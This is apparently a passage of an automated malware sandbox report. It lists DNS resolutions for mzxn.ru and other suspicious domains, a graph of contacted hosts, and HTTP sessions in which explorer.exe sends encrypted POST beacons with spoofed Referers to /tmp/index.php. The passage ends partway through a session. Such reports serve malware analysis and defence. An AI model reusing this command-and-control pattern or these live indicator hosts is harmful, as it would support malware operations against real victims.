Jul 27, 2024 07:43:20.871543884 CEST	1.1.1.1	192.168.2.4	0xd6fa	No error (0)	mzxn.ru	148.230.249.9	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:43:20.871560097 CEST	1.1.1.1	192.168.2.4	0xd6fa	No error (0)	mzxn.ru	186.145.236.93	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:43:20.871560097 CEST	1.1.1.1	192.168.2.4	0xd6fa	No error (0)	mzxn.ru	154.144.253.197	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:43:20.871560097 CEST	1.1.1.1	192.168.2.4	0xd6fa	No error (0)	mzxn.ru	190.218.33.19	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:43:20.871560097 CEST	1.1.1.1	192.168.2.4	0xd6fa	No error (0)	mzxn.ru	190.187.52.42	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:43:20.871560097 CEST	1.1.1.1	192.168.2.4	0xd6fa	No error (0)	mzxn.ru	190.249.193.233	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:43:20.871560097 CEST	1.1.1.1	192.168.2.4	0xd6fa	No error (0)	mzxn.ru	181.80.4.144	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:43:20.871560097 CEST	1.1.1.1	192.168.2.4	0xd6fa	No error (0)	mzxn.ru	190.98.23.157	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:43:20.871560097 CEST	1.1.1.1	192.168.2.4	0xd6fa	No error (0)	mzxn.ru	211.181.24.133	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:43:20.871560097 CEST	1.1.1.1	192.168.2.4	0xd6fa	No error (0)	mzxn.ru	175.119.10.231	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:43:20.871560097 CEST	1.1.1.1	192.168.2.4	0xd6fa	No error (0)	mzxn.ru	148.230.249.9	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:43:20.871570110 CEST	1.1.1.1	192.168.2.4	0xd6fa	No error (0)	mzxn.ru	186.145.236.93	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:43:20.871570110 CEST	1.1.1.1	192.168.2.4	0xd6fa	No error (0)	mzxn.ru	154.144.253.197	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:43:20.871570110 CEST	1.1.1.1	192.168.2.4	0xd6fa	No error (0)	mzxn.ru	190.218.33.19	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:43:20.871570110 CEST	1.1.1.1	192.168.2.4	0xd6fa	No error (0)	mzxn.ru	190.187.52.42	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:43:20.871570110 CEST	1.1.1.1	192.168.2.4	0xd6fa	No error (0)	mzxn.ru	190.249.193.233	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:43:20.871570110 CEST	1.1.1.1	192.168.2.4	0xd6fa	No error (0)	mzxn.ru	181.80.4.144	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:43:20.871570110 CEST	1.1.1.1	192.168.2.4	0xd6fa	No error (0)	mzxn.ru	190.98.23.157	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:43:20.871570110 CEST	1.1.1.1	192.168.2.4	0xd6fa	No error (0)	mzxn.ru	211.181.24.133	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:43:20.871570110 CEST	1.1.1.1	192.168.2.4	0xd6fa	No error (0)	mzxn.ru	175.119.10.231	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:43:20.871570110 CEST	1.1.1.1	192.168.2.4	0xd6fa	No error (0)	mzxn.ru	148.230.249.9	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:44:01.070944071 CEST	1.1.1.1	192.168.2.4	0x63f4	No error (0)	mussangroup.com	185.149.100.242	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:44:14.742911100 CEST	1.1.1.1	192.168.2.4	0xbc0a	No error (0)	funrecipebooks.com	162.0.235.84	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:44:22.526438951 CEST	1.1.1.1	192.168.2.4	0x5879	No error (0)	rentry.co	104.26.2.16	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:44:22.526438951 CEST	1.1.1.1	192.168.2.4	0x5879	No error (0)	rentry.co	172.67.75.40	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:44:22.526438951 CEST	1.1.1.1	192.168.2.4	0x5879	No error (0)	rentry.co	104.26.3.16	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:44:24.628540039 CEST	1.1.1.1	192.168.2.4	0x27b1	No error (0)	callosallsaospz.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:44:24.628540039 CEST	1.1.1.1	192.168.2.4	0x27b1	No error (0)	callosallsaospz.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:44:25.374327898 CEST	1.1.1.1	192.168.2.4	0xf321	No error (0)	store4.gofile.io	31.14.70.245	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:44:33.044087887 CEST	1.1.1.1	192.168.2.4	0x8516	No error (0)	liernessfornicsa.shop	172.67.213.85	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:44:33.044087887 CEST	1.1.1.1	192.168.2.4	0x8516	No error (0)	liernessfornicsa.shop	104.21.77.246	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.946281910 CEST	1.1.1.1	192.168.2.4	0x70cd	No error (0)	mzxn.ru	154.144.253.197	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.946281910 CEST	1.1.1.1	192.168.2.4	0x70cd	No error (0)	mzxn.ru	190.218.33.19	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.946281910 CEST	1.1.1.1	192.168.2.4	0x70cd	No error (0)	mzxn.ru	190.187.52.42	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.946281910 CEST	1.1.1.1	192.168.2.4	0x70cd	No error (0)	mzxn.ru	190.249.193.233	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.946281910 CEST	1.1.1.1	192.168.2.4	0x70cd	No error (0)	mzxn.ru	181.80.4.144	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.946281910 CEST	1.1.1.1	192.168.2.4	0x70cd	No error (0)	mzxn.ru	190.98.23.157	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.946281910 CEST	1.1.1.1	192.168.2.4	0x70cd	No error (0)	mzxn.ru	211.181.24.133	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.946281910 CEST	1.1.1.1	192.168.2.4	0x70cd	No error (0)	mzxn.ru	175.119.10.231	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.946281910 CEST	1.1.1.1	192.168.2.4	0x70cd	No error (0)	mzxn.ru	148.230.249.9	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.946281910 CEST	1.1.1.1	192.168.2.4	0x70cd	No error (0)	mzxn.ru	186.145.236.93	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.946293116 CEST	1.1.1.1	192.168.2.4	0x70cd	No error (0)	mzxn.ru	154.144.253.197	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.946293116 CEST	1.1.1.1	192.168.2.4	0x70cd	No error (0)	mzxn.ru	190.218.33.19	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.946293116 CEST	1.1.1.1	192.168.2.4	0x70cd	No error (0)	mzxn.ru	190.187.52.42	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.946293116 CEST	1.1.1.1	192.168.2.4	0x70cd	No error (0)	mzxn.ru	190.249.193.233	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.946293116 CEST	1.1.1.1	192.168.2.4	0x70cd	No error (0)	mzxn.ru	181.80.4.144	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.946293116 CEST	1.1.1.1	192.168.2.4	0x70cd	No error (0)	mzxn.ru	190.98.23.157	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.946293116 CEST	1.1.1.1	192.168.2.4	0x70cd	No error (0)	mzxn.ru	211.181.24.133	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.946293116 CEST	1.1.1.1	192.168.2.4	0x70cd	No error (0)	mzxn.ru	175.119.10.231	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.946293116 CEST	1.1.1.1	192.168.2.4	0x70cd	No error (0)	mzxn.ru	148.230.249.9	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.946293116 CEST	1.1.1.1	192.168.2.4	0x70cd	No error (0)	mzxn.ru	186.145.236.93	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.946295977 CEST	1.1.1.1	192.168.2.4	0x70cd	No error (0)	mzxn.ru	154.144.253.197	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.946295977 CEST	1.1.1.1	192.168.2.4	0x70cd	No error (0)	mzxn.ru	190.218.33.19	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.946295977 CEST	1.1.1.1	192.168.2.4	0x70cd	No error (0)	mzxn.ru	190.187.52.42	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.946295977 CEST	1.1.1.1	192.168.2.4	0x70cd	No error (0)	mzxn.ru	190.249.193.233	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.946295977 CEST	1.1.1.1	192.168.2.4	0x70cd	No error (0)	mzxn.ru	181.80.4.144	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.946295977 CEST	1.1.1.1	192.168.2.4	0x70cd	No error (0)	mzxn.ru	190.98.23.157	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.946295977 CEST	1.1.1.1	192.168.2.4	0x70cd	No error (0)	mzxn.ru	211.181.24.133	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.946295977 CEST	1.1.1.1	192.168.2.4	0x70cd	No error (0)	mzxn.ru	175.119.10.231	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.946295977 CEST	1.1.1.1	192.168.2.4	0x70cd	No error (0)	mzxn.ru	148.230.249.9	A (IP address)	IN (0x0001)	false
Jul 27, 2024 07:45:54.946295977 CEST	1.1.1.1	192.168.2.4	0x70cd	No error (0)	mzxn.ru	186.145.236.93	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

mussangroup.com

167.235.128.153

107.173.160.137

107.173.160.139

funrecipebooks.com

rentry.co

callosallsaospz.shop

store4.gofile.io

liernessfornicsa.shop

crbyycflvhqviag.net

mzxn.ru

rkjvhpickvgumugy.com

mlolxnvijkbxdkju.net

crtrnvacvaqsvh.net

igyjobtodmctowt.net

sowhywcgsmotmk.net

wathnngxbyoowmd.org

fcdtsqtavhskibhj.com

77.221.157.163

gepaukacbiyo.org

uuinbvqevufc.com

ewndxwxqsldh.com

pcatlfkkstdxqqw.org

cxcsmobdatpu.org

64.190.113.113

qnawhflyfaljta.net

soaxpgcflilwcjk.net

jtecgpbonqhjbs.net

kriqrmlnqypou.org

wrfvitgbvcw.org

bnvcslusckae.com

qinwutyayfcko.net

fpsqjgbmrba.com

fnhraoopptocahym.org

uffvfrhcnqd.com

109.172.114.212

mbsrmkgaclwdahn.org

hkiilqyskldjgofe.net

brdcuglswdjuibu.com

jqxhoujpotsnhua.com

igndfrdsspnvoxyl.com

snlibtbsitsby.org

srmyuatrmfavkh.org

yepbkxlonjp.org

rqsjxbmjbmnltw.com

oydnksqvapytmm.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	62233	186.145.236.93	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:43:20.898057938 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://crbyycflvhqviag.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 335 Host: mzxn.ru
Jul 27, 2024 07:43:20.898077011 CEST	335	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 28 09 d9 ed Data Ascii: ;nVcjVy{zhgyrDh\!*? 9Yt M@NA .[k,vu(DZ@s$8H[0ss1t'w#_R()2M\|x4Rzxn8XY6r<802(.vY+5yKbkCE?r
Jul 27, 2024 07:43:21.957808018 CEST	152	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:43:21 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 04 00 00 00 72 e8 86 ec Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	62234	186.145.236.93	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:43:21.968509912 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rkjvhpickvgumugy.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 233 Host: mzxn.ru
Jul 27, 2024 07:43:21.968509912 CEST	233	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 6e 3e a5 ac Data Ascii: ;nVcjVy{zhgyrDh\!*? 9Yt M@NA -[k,vun>J z]Da]M_;=?w?{oe,.AvtVr!^"\8<_^tsM00bO$RX^`!s/
Jul 27, 2024 07:43:23.015682936 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:43:22 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	62235	186.145.236.93	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:43:23.026930094 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mlolxnvijkbxdkju.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 314 Host: mzxn.ru
Jul 27, 2024 07:43:23.026974916 CEST	314	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 51 5b da aa Data Ascii: ;nVcjVy{zhgyrDh\!? 9Yt M@NA -[k,vuQ[w/q%(\|dc!9 fYWaL=U+5W\|aLOS3HA#SpiegvoXc}YZ:
Jul 27, 2024 07:43:24.082078934 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:43:23 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	62236	186.145.236.93	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:43:24.090785980 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://crtrnvacvaqsvh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 148 Host: mzxn.ru
Jul 27, 2024 07:43:24.090817928 CEST	148	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 29 51 af fc Data Ascii: ;nVcjVy{zhgyrDh\!*? 9Yt M@NA -[k,vu)Qq]eI6)M!"uQcFT]U0 9>rhh
Jul 27, 2024 07:43:25.115849972 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:43:24 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	62237	186.145.236.93	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:43:25.146294117 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://igyjobtodmctowt.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 117 Host: mzxn.ru
Jul 27, 2024 07:43:25.146311045 CEST	117	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 2f 0d cf f5 Data Ascii: ;nVcjVy{zhgyrDh\!*? 9Yt M@NA -[k,vu//c\l\|]A6nq
Jul 27, 2024 07:43:26.412009001 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:43:26 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	62238	186.145.236.93	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:43:26.420757055 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sowhywcgsmotmk.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 159 Host: mzxn.ru
Jul 27, 2024 07:43:26.420789957 CEST	159	OUT	Data Raw: 3b 6e 56 63 f5 cb 6a 56 d8 d9 b5 00 07 06 79 b9 7b 7a b9 e6 68 03 94 67 0c 79 72 e2 44 b0 c7 68 9b 5c ce 21 0e 1a 2a 19 ea 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 7c 24 d4 b9 Data Ascii: ;nVcjVy{zhgyrDh\!? 9Yt M@NA -[k,vu\|$s5wh[es2auFbS=%MbcZt"N,
Jul 27, 2024 07:43:27.450252056 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:43:27 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	62239	186.145.236.93	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
